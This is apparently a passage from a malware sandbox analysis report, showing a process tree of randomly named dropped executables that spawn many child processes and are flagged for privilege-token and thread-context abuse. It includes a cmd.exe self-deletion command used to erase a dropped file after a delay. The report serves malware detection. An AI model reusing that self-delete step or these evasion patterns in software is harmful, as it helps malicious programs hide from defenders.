    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:13932
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:10392
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:14676
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:15308
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:15292
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:15328
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:14984
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:15896
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:16352
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:6916
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:12032
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:6276
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:16812
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:16924
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:17436
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:14048
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:14396
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:11588
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:17976
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:17780
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:15564
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:18044
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:18672
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:19048
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:19412
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:16624
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:19112
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:18644
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:1784
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:10052
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:12244
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:19536
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:20008
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:19372
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:19780
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:19044
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:20156
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:9568
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:19176
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:17796
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:18264
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:21068
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:22020
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:21040
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:16984
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:22976
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:22540
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:6564
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:21620
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:24540
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:19180
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:25192
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:24464
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:22812
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:5864
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:21784
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:24848
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:20856
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:26312
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:20820
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:19560
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:20200
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:23188
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:26736
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:27472
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:26860
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:24764
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:27496
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:27000
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:23348
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:28268
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:27844
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:27896
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:27076
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:28916
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:29068
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:28548
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:26136
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:25556
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:25224
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:27376
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:27796
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:26684
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:27008
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:30388
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:31000
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:31376
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:28692
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:31236
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:5924
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:27860
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:29708
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:30228
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:29548
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:29960
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:27728
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:28992
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:29796
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:8836
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:28476
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:30728
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:32024
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:5520
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:28784
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:30000
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:30340
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:5820
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:30528
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:11360
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:32660
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:20984
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:11628
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:31900
- - C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    C:\Users\Admin\Documents\gyeTTeQMk7okn3MLzvlxWIav.exe
    3⤵
    PID:12600
- C:\Users\Admin\Documents\ubaATb0PJHxnq6d65ECsPkzE.exe
  "C:\Users\Admin\Documents\ubaATb0PJHxnq6d65ECsPkzE.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2356
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\ubaATb0PJHxnq6d65ECsPkzE.exe"
    3⤵
    PID:5064
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:6396
- C:\Users\Admin\Documents\Y5KPfNWM24nh2NlqciqtELNp.exe
  "C:\Users\Admin\Documents\Y5KPfNWM24nh2NlqciqtELNp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:204
- C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
  "C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3584
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4888
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4172
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3992
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5472
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    - Executes dropped EXE
    PID:5988
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    - Executes dropped EXE
    PID:5820
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    - Executes dropped EXE
    PID:4988
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:1572
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:4356
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:6436
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:7060
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:5200
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:3816
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:4700
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:7584
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:8048
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:7208
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:6832
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:6804
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:7504
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:6156
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:1356
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 24
      4⤵
      Program crash
      PID:8548
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:8420
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:8968
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:8248
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:8620
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:7136
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:8640
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:6292
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:9624
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:10172
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    3⤵
    PID:9608
- - C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
    C:\Users\Admin\Documents\hSGnSCPD7b17YIidPAVMlaPN.exe
